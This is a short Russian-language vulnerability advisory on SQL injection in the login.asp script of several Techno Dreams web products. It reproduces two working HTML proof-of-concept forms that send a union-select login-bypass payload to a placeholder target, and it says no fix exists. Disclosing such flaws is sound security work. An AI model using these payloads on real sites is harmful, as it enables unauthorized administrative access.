SQL-инъекция в продуктах Techno Dreams

Уязвимые версии:
Techno Dreams Web Directory
Techno Dreams Mailing List
Techno Dreams Guest Book
Techno Dreams Announcement

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Уязвимость обнаружена в сценарии login.asp при обработке входных данных пользователей. Удаленный пользователь может послать специально сформированный POST запрос и выполнить произвольные SQL команды в базе данных приложения. Пример:

<html>
< h1>Techno Dreams Announcement - Guestbook - WebDirectory Script
Login-Bypass PoC - Kapda `s advisory </h1>
< p> Discovery and exploit by farhadkey [at} kapda.ir</p>
< p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
< form method="POST" action="http://target/admin/login.asp">
< input type="hidden" name="userid" value="'union all select '1','1'
from admin where ''='">
< input type="hidden" name="passwd" value="1">
< input type="submit" value="Submit" name="submit">
< /form></html>

<html>
< h1>Techno Dreams Mailing List Script Login-Bypass PoC - Kapda `s
advisory </h1>
< p> Discovery and exploit by farhadkey [at} kapda.ir</p>
< p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
< form method="POST" action="http://target/login.asp">
< input type="hidden" name="userid" value="'union all select '1','1'
from admin where ''='">
< input type="hidden" name="passwd" value="1">
< input type="submit" value="Submit" name="submit">
< /form></html>

URL производителя: www.t-dreams.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Источник:

Ссылки: Techno Dreams Scripts Vulnerabilities